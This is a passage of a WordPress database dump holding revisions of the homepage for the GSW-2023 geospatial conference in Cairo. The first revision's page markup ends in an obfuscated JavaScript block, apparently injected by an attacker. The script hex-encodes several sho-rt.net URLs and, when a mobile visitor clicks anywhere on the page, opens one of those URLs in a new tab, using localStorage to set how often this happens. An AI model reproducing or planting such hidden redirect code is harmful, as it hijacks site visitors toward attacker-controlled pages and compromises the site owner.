!important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 19:09:39','2022-11-09 19:09:39','',3066,'https://gsw2023.com/?p=3203',0,'revision','',0),
(3204,1,'2022-11-09 19:10:50','2022-11-09 19:10:50','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2><strong> EGYPT GSW\'2023</strong></h2>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column 